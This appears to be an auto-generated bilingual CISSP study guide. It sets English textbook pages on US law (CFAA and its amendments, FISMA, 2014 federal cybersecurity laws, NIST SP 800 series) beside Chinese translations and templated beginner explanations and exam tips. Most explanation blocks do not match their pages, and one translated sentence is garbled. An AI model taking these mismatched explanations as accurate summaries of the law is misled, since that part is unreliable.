Government agencies may not implement regulations that directly contradict existing laws passed by the legislature. Furthermore,

中文直译 / 整理

民法与刑法的主要区别在于其执行方式。 通常,执法机关在民事事务中仅采取 必要措施以恢复秩序,不会深入介入。 在刑事诉讼中,政府通过执法调查人员 和检察官对被指控犯罪的人提起诉讼。 而在民事事务中,认为自己权益受损的 人有责任寻求法律咨询,并向其认为应对其损害负责的人提起民事诉讼。 政府 (除非其为原告或被告)不介入争议,不支持任何一方立场。 政府在民事事务 中的唯一作用是提供审理民事案件所需的法官、陪审团和法庭设施,并依法履 行管理司法系统的行政职责。 与刑法一样,如果您认为自己需要提起民事诉讼,或有人对您提起民事诉讼, 最好寻求法律协助。 尽管民法不会带来监禁的威胁,但败诉方可能面临严重的 经济处罚。 您无需远寻实例——每天都有针对烟草公司、大型企业及富有个人 的数百万美元民事诉讼案件被提起。 行政法 美国政府的行政分支委托众多机构承担广泛职责,以确保政府有效运作。 这些 机构有责任遵守并执行立法分支颁布的刑事和民事法律。 然而,正如容易想象 的那样,刑事和民事法律不可能详尽规定所有可能情况下的规则和程序。 因此, 行政分支的机构有权以行政命令、政策、程序和法规的形式制定行政法,以规 范机构的日常运作。

行政法涵盖的范围从联邦机构内申请办公电话等琐碎程序, 到用于执行国会通过法律的移民政策等重大议题。 行政法已公布于《联邦法规 汇编》(CFR)中。 尽管行政法无需立法机构的法案即可具有法律效力,但必须遵守所有现有的民 事和刑事法律。 政府机构不得实施与立法机构通过的现有法律直接冲突的法规。 此外,

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 06 / PDF P278

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

administrative laws (and the actions of government agencies) must also comply with the U.S. Constitution and are subject to judicial review. To understand compliance requirements and procedures, you must be fully versed in the complexities of the law. From administrative law to civil law to criminal law (and, in some countries, even religious law), navigating the regulatory environment is a daunting task. You should focus on the generalities of law, regulations, investigations, and compliance as they affect organizational security efforts. Specifically, you will need to: Understand legal and regulatory issues that pertain to information security in a holistic concept.

Determine compliance and other requirements that apply to your organization. However, it is your responsibility to seek out professional help (i.e., an attorney) to guide and support you in your efforts to maintain legal and legally supportable security. Laws In this section, we'll examine a number of laws that relate to information technology. We'll examine several U.S. laws. We'll also look briefly at several high-profile non-U.S. laws, such as the European Union's General Data Protection Regulation (GDPR). Regardless, if you operate in an environment that involves foreign jurisdictions, you should retain local legal counsel to guide you through the system.

Every information security professional should have a basic understanding of the law as it relates to information technology. However, the most important lesson to be learned is knowing when it's necessary to call in an attorney. If you think you're in a legal “gray area,” it's best to seek professional advice. Computer Crime

中文直译 / 整理

行政法规(以及政府机构的行为)还必须遵守美国宪法,并接受司法审查。 要理解合规要求和程序,您必须全面掌握法律的复杂性。 从行政法、民法到刑 法(在某些国家甚至包括宗教法),应对监管环境是一项艰巨的任务。 您应重 点关注法律、法规、调查和合规对组织安全工作的影响。 具体而言,您需要: 理解le g铝和铼 g与信息相关的监管问题 整体概念中的安全性。 确定适用于您的合规性及其他要求 组织。 然而,您有责任寻求专业帮助(即律师)以指导和支持您在维护合法且 可法律支持的安全措施方面的努力。 Laws 在本节中,我们将探讨一些与信息技术相关的法律。 我们将研究几项美国法律。 我们还将简要考察几项著名的非美国法律,例如欧盟的《通用数据保护条例》 (GDPR)。 无论如何,如果您在涉及外国司法管辖区的环境中运营,您应聘 请当地法律顾问以指导您应对该体系。 每位信息安全专业人员都应具备与信息技术相关的法律基础知识。 然 而,最重要的一课是知道何时需要寻求律师的帮助。 如果你认为自己处于 法律的“灰色地带”,最好寻求专业建议。 计算机犯罪

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 07 / PDF P279

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

The first computer security issues addressed by legislators were those involving computer crime. Early computer crime prosecutions were attempted under traditional criminal law, and many were dismissed because judges thought that applying traditional law to this modern type of crime was too far a stretch. Legislators responded by passing specific statutes that defined computer crime and laid out specific penalties for various crimes. In the following sections, we'll cover several of those statutes. The U.S. laws discussed in this chapter are federal laws. But keep in mind that almost every state in the union has also enacted some form of legislation regarding computer security issues.

Because of the global reach of the Internet, most computer crimes cross state lines and, therefore, fall under federal jurisdiction and are prosecuted in the federal court system. However, in some circumstances, state laws can be more restrictive than federal laws and impose harsher penalties. Computer Fraud and Abuse Act The Counterfeit Access Device and Computer Fraud and Abuse Act of 1984 was the first major piece of cybercrime-specific legislation in the United States. This act was then amended in 1986 to create the modern Computer Fraud and Abuse Act (CFAA), which has since been amended periodically.

Congress had earlier enacted computer crime law as part of the Comprehensive Crime Control Act (CCCA) of 1984, but the CFAA was carefully written to exclusively cover computer crimes that crossed state boundaries to avoid infringing on states' rights and treading on thin constitutional ice. The major provisions of the original CCCA made it a crime to perform the following: Access classified information or financial information in a federal system without authorization or in excess of authorized privileges. Access a computer used exclusively by the federal government without authorization.

Use a federal computer to perpetrate a fraud (unless the only object of the fraud was to gain use of the computer itself).

中文直译 / 整理

立法者最初应对的计算机安全问题涉及计算机犯罪。 早期的计算机犯罪案 件尝试依据传统刑法进行起诉,但许多案件被驳回,因为法官们认为将传统法 律适用于这种现代犯罪形式过于牵强。 为此,立法者通过了专门的法律条款, 明确定义了计算机犯罪,并规定了各类犯罪的具体处罚。 在以下章节中,我们 将介绍其中几项法律条款。 本章讨论的美国法律是联邦法律。 但请注意,联邦内几乎每个州都制 定了某种形式的计算机安全相关立法。 由于互联网的全球性,大多数计算 机犯罪都跨越州界,因此属于联邦管辖范围,并由联邦法院系统进行起诉。 然而,在某些情况下,州法律可能比联邦法律更为严格,并施加更严厉的 处罚。 计算机欺诈与滥用法案 1984年的《伪造访问设备与计算机欺诈与滥用法案》是美国第一部专门针对网 络犯罪的立法。 该法案于1986年进行了修订,形成了现代的《计算机欺诈与滥 用法案》(CFAA),此后该法案又经过多次修订。 此前,国会已将计算机犯 罪法律作为1984年《综合犯罪控制法案》(CCCA)的一部分颁布,但 CFAA被精心设计为仅涵盖跨越州界的计算机犯罪,以避免侵犯各州权利并规 避宪法上的敏感问题。

原始CCCA的主要条款将以下行为定为犯罪: 未经授权或超出授权权限,访问联邦系统中的机密信息或财务信息。 未经授权访问仅由联邦政府使用的计算机。 使用联邦计算机实施欺诈(除非欺诈的唯一目的是获取计算机本身的使用 权限)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 08 / PDF P280

第 280 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Cause malicious damage to a federal computer system in excess of $1,000. Modify medical records in a computer when doing so impairs or may impair the examination, diagnosis, treatment, or medical care of an individual. Traffic in computer passwords if the trafficking affects interstate commerce or involves a federal computer system. When Congress passed the CFAA, it raised the threshold of damage from $1,000 to $5,000 but also dramatically altered the scope of the regulation. Instead of merely covering federal computers that processed sensitive information, the act was changed to cover all “federal interest” computers.

This widened the coverage of the act to include the following: Any computer used exclusively by the U.S. government Any computer used exclusively by a financial institution Any computer used by the government or a financial institution when the offense impedes the ability of the government or institution to use that system Any combination of computers used to commit an offense when they are not all located in the same state Be sure you're able to briefly describe the purpose of each law discussed in this chapter.

CFAA Amendments In 1994, Congress recognized that the face of computer security had drastically changed since the CFAA was last amended in 1986 and made a number of sweeping changes to the act. Collectively, these changes are referred to as the Computer Abuse Amendments Act of 1994 and included the following provisions: Outlawed the creation of any type of malicious code that might cause damage to a computer system

中文直译 / 整理

对联邦计算机系统造成超过1,000美元的恶意损害。 在修改计算机中的医疗记录时,若该行为损害或可能损害个人的检查、 诊断、治疗或医疗护理。 交易计算机密码,若该交易影响州际商业或涉及联邦计算机系统。 当国会通过《计算机欺诈与滥用法》时,将损害门槛从1,000美元提高到 5,000美元,同时大幅改变了监管范围。 该法案不再仅涵盖处理敏感信息的 联邦计算机,而是修改为涵盖所有“联邦利益”计算机。 这扩大了该法案的 适用范围,包括以下内容: 任何 exclusively 由美国政府使用的计算机 任何 exclusively 由金融机构使用的计算机 任何由政府或金融机构使用的计算机,且当该违法行为阻碍政府或机构 使用该系统时 任何用于实施犯罪的计算机组合,只要这些计算机并非全部位于同一州内 请确保您能够简要描述本章所讨论的每项法律的目的。 CFAA 修正案 1994年,国会认识到,自1986年CFAA最后一次修订以来,计算机安全的面貌 已发生巨大变化,因此对法案进行了多项重大修订。 这些修订统称为1994年计 算机滥用修正案,其中包括以下条款: 禁止创建可能对计算机系统造成损害的任何类型的恶意代码

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 280 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 09 / PDF P281

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Modified the CFAA to cover any computer used in interstate commerce rather than just “federal interest” computer systems Allowed for the imprisonment of offenders, regardless of whether they actually intended to cause damage Provided legal authority for the victims of computer crime to pursue civil action to gain injunctive relief and compensation for damages Since the initial CFAA amendments in 1994, Congress passed additional amendments in 1996, 2001, 2002, and 2008 as part of other cybercrime legislation. We'll discuss those as they come up in this chapter.

Although the CFAA may be used to prosecute a variety of computer crimes, it is also criticized by many in the security and privacy community as an overbroad law. Under some interpretations, the CFAA criminalizes the violation of a website's terms of service. This law was used to prosecute Aaron Swartz for downloading a large number of academic research papers from a database accessible on the MIT network. Swartz died by suicide in 2013 and inspired the drafting of a CFAA amendment that would have excluded the violation of website terms of service from the CFAA. That bill, dubbed Aaron's Law, never reached a vote on the floor of Congress.

Ongoing legislative and judicial actions may affect the broad interpretations of the CFAA in the United States. For example, in the 2020 case Sandvig v. Barr, a federal court ruled that the CFAA did not apply to the violations of the terms of use of a website because that would effectively allow website operators to define the boundaries of criminal activity. In 2021, the U.S. Supreme Court ruled in the case, Van Buren v. United States, that someone violates CFAA if they first access a computer system that they are authorized to access but then obtain information from files, folders, or databases that they are not authorized to access.

National Information Infrastructure Protection Act of 1996 In 1996, the U.S. Congress passed yet another set of amendments to the Computer Fraud and Abuse Act designed to further extend the protection it provides. The National Information Infrastructure Protection Act (NIIPA) included the following main new areas of coverage: Broadens the CFAA to cover computer systems used in international commerce in addition to systems used in interstate commerce

中文直译 / 整理

修改了《计算机欺诈与滥用法》,使其适用于用于州际贸易的任何计算机, 而不仅限于“联邦利益”计算机系统 允许对犯罪者实施监禁,无论其是否实际有意造成损害 为计算机犯罪的受害者提供了提起民事诉讼以获得禁令救济和损害赔偿的法律 授权 自1994年首次修订CFAA以来,国会又在1996年、2001年、2002年和2008年作 为其他网络犯罪立法的一部分通过了额外的修正案。 我们将在本章中讨论这些修 正案。 尽管CFAA可用于起诉多种计算机犯罪,但它也受到安全和隐私界许多人的批评, 被认为是一部过于宽泛的法律。 在某些解释下,CFAA将违反网站服务条款的行 为定为犯罪。 该法律曾被用于起诉亚伦·斯沃茨,因其从麻省理工学院网络可访 问的数据库中下载了大量学术研究论文。 斯沃茨于2013年自杀身亡,这激发了 起草一项CFAA修正案的行动,旨在将违反网站服务条款的行为排除在CFAA之 外。 该法案被称为“亚伦法”,但从未在国会全体会议上进行表决。 正在进行的立法和司法行动可能会影响美国《计算机欺诈与滥用法》(CFAA) 的广泛解释。

例如,在2020年的案件Sandvig v.Barr中,联邦法院裁定, CFAA不适用于违反网站使用条款的行为,因为这将使网站运营商实际上能够 界定犯罪活动的边界。 2021年,美国最高法院在Van Buren v. United States一 案中裁定,如果某人首先访问了其被授权访问的计算机系统,但随后获取了其 无权访问的文件、文件夹或数据库中的信息,则构成违反CFAA。 1996年国家信息基础设施保护法 1996年,美国国会通过了另一组对《计算机欺诈与滥用法》的修正案,旨在 进一步扩大其提供的保护范围。 《国家信息基础设施保护法》(NIIPA)包 括以下主要新增覆盖领域: 将《计算机欺诈与滥用法》的适用范围扩大至用于国际商业的计算机系统, 而不仅限于用于州际商业的系统

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
学习单元 10 / PDF P282

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Extends similar protections to portions of the national infrastructure other than computing systems, such as railroads, gas pipelines, electric power grids, and telecommunications circuits Treats any intentional or reckless act that causes damage to critical portions of the national infrastructure as a felony Federal Information Security Management Act of 2002 The Federal Information Security Management Act (FISMA), passed in 2002, requires that federal agencies implement an information security program that covers the agency's operations. FISMA also requires that government agencies include the activities of contractors in their security management programs.

FISMA repealed and replaced two earlier laws: the Computer Security Act of 1987 and the Government Information Security Reform Act of 2000.

The National Institute of Standards and Technology (NIST), responsible for developing the FISMA implementation guidelines, outlines the following elements of an effective information security program: Periodic assessments of risk, including the magnitude of harm that could result from the unauthorized access, use, disclosure, disruption, modification, or destruction of information and information systems that support the operations and assets of the organization Policies and procedures that are based on risk assessments, costeffectively reducing information security risks to an acceptable level and ensuring that information security is addressed throughout the life cycle of each organizational information system Subordinate plans for providing adequate information security for networks, facilities, information systems, or groups of information systems, as appropriate Security awareness training to inform personnel (including contractors and other users of information systems that support the operations and assets of the organization) of the information security risks associated with their activities and their responsibilities in complying with organizational policies and procedures designed to reduce these risks Periodic testing and evaluation of the effectiveness of information security policies, procedures, practices, and security controls to be

中文直译 / 整理

将类似保护扩展至计算系统之外的国家基础设施部分,例如铁路、天然 气管道、电力网络和电信线路 将任何故意或鲁莽地造成国家关键基础设施受损的行为视为重罪 2002年联邦信息安全管理法案 2002年通过的《联邦信息安全管理法案》(FISMA)要求联邦机构实施涵盖其 业务的信息安全计划。 FISMA还要求政府机构将其承包商的活动纳入其安全管 理计划中。 FISMA废止并取代了两项早期法律:1987年的《计算机安全法》和 2000年的《政府信息安全改革法》。

负责制定FISMA实施指南的国家标准与技术研究院(NIST)概述了有效信 息安全计划的以下要素: 定期进行风险评估,包括因未经授权访问、使用、披露、干扰、修改或破 坏支持组织业务和资产的信息和信息系统而可能造成的损害程度 基于风险评估的政策和程序,以成本效益的方式将信息安全风险降低到可 接受水平,并确保在组织每个信息系统的整个生命周期中都考虑到信息安 全 为网络、设施、信息系统或信息系统组提供充分的信息安全的子计 划,视情况而定 安全意识培训,以使人员(包括承包商和其他使用支持组织运营和资产的 信息系统的用户)了解其活动相关的信息安全风险,以及其在遵守旨在降 低这些风险的组织政策和程序方面的责任 定期测试和评估信息安全政策、程序、实践和安全控制的有效性,以

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
学习单元 11 / PDF P283

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

performed with a frequency depending on risk, but no less than annually A process for planning, implementing, evaluating, and documenting remedial actions to address any deficiencies in the information security policies, procedures, and practices of the organization Procedures for detecting, reporting, and responding to security incidents Plans and procedures to ensure continuity of operations for information systems that support the operations and assets of the organization FISMA places a significant burden on federal agencies and government contractors, who must develop and maintain substantial documentation of their FISMA compliance activities.

Federal Cybersecurity Laws of 2014 In 2014, President Barack Obama signed a series of bills into law that modernized the federal government's approach to cybersecurity issues. The first of these was the Federal Information Security Modernization Act of 2014, which amended the 2002 version of FISMA. The 2014 FISMA modified the rules of the 2002 FISMA by centralizing federal cybersecurity responsibility with the Department of Homeland Security (DHS). There are two exceptions to this centralization: defense-related cybersecurity issues remain the responsibility of the secretary of defense, and the director of national intelligence bears responsibility for intelligence-related issues.

Second, Congress passed the Cybersecurity Enhancement Act of 2014, which charges NIST with responsibility for coordinating nationwide work on voluntary cybersecurity standards. This act was amended in 2022 to create an ongoing and voluntary public/private partnership to improve cybersecurity, strengthen cybersecurity research and development, develop the cybersecurity workforce, and build public cybersecurity awareness. NIST produces the 800 series of Special Publications related to computer security in the federal government. These are useful for all security practitioners and are available for free online at http://csrc.nist.gov/publications/sp800.

The following are commonly used NIST standards: NIST SP 800-53: Security and Privacy Controls for Information Systems and Organizations. This standard is required for use in federal

中文直译 / 整理

根据风险确定频率,但每年不得少于一次 一种规划、实施、评估和记录补救措施的流程,以解决组织信息安全管 理政策、程序和实践中的任何缺陷 检测、报告和应对安全事件的程序 确保支持组织运营和资产的信息系统业务连续性的计划和程序 《联邦信息安全管理法》给联邦机构和政府承包商带来了重大负担,他们必 须制定并维护关于其FISMA合规活动的大量文档。 2014年联邦网络安全法 2014年,总统巴拉克·奥巴马签署了一系列法案,以现代化联邦政府应对网 络安全问题的方法。 这些法规中的第一项是《2014年联邦信息安全现代化法案》,该法案修订了 2002年版的FISMA。 2014年版的FISMA通过将联邦网络安全责任集中于国土 安全部(DHS)来修改了2002年版FISMA的规定。 这一集中化有两个例外: 与国防相关的网络安全问题仍由国防部长负责,国家情报总监则对与情报相关 的问题负责。 其次,国会通过了《2014年网络安全增强法案》,该法案授权NIST负责协调 全国范围内自愿性网络安全标准的工作。

该法案于2022年进行了修订,以建立 持续的、自愿的公私合作伙伴关系,以改善网络安全、加强网络安全研发、培 养网络安全人才并提升公众的网络安全意识。 NIST发布了一系列与联邦政府计算机安全相关的800系列特别出版物。 这 些出版物对所有安全从业人员均有用,并可免费在线获取。 http://csrc.nist.gov/publications/sp800. 以下是常用的NIST标准: NIST SP 800-53: 信息系统的安全与隐私控制。 该标准是联邦

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 12 / PDF P284

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

computing systems and is also commonly used as an industry cybersecurity benchmark. NIST SP 800-171: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations. Compliance with this standard's security controls (which are quite similar to those found in NIST 800-53) is often included as a contractual requirement by government agencies. Federal contractors must often comply with NIST SP 800-171. The NIST Cybersecurity Framework (CSF) is a set of standards designed to serve as a voluntary risk-based framework for securing information and systems. The third law from this wave of new requirements was the National Cybersecurity Protection Act of 2014.

This law charged the Department of Homeland Security with establishing a national cybersecurity and communications integration center. The role of this center is to serve as the interface between federal agencies and civilian organizations for sharing cybersecurity risks, incidents, analysis, and warnings. Intellectual Property (IP) America's role in the global economy is shifting away from a manufacturer of goods and toward a provider of services. This trend also shows itself in many of the world's large industrialized nations. With this shift toward providing services, intellectual property (IP) takes on an increasingly important role in many firms.

Indeed, it is arguable that the most valuable assets of many large multinational companies are simply the brand names that we've all come to recognize. Company names such as Dell, Procter & Gamble, and Merck bring instant credibility to any product. Publishing companies, movie producers, and artists depend on their creative output to earn their livelihood. Many products depend on secret recipes or production techniques—take the legendary secret formula for Coca-Cola or KFC's secret blend of herbs and spices, for example. These intangible assets are collectively referred to as intellectual property (IP), and a whole host of laws exist to protect the rights of their owners.

After all, it simply wouldn't be fair if a bookstore bought only one copy of each author's book and made copies for all of its customers—that would deprive the author of the benefits of their labor. In the following sections, we'll explore the laws surrounding the four major types of intellectual property—

中文直译 / 整理

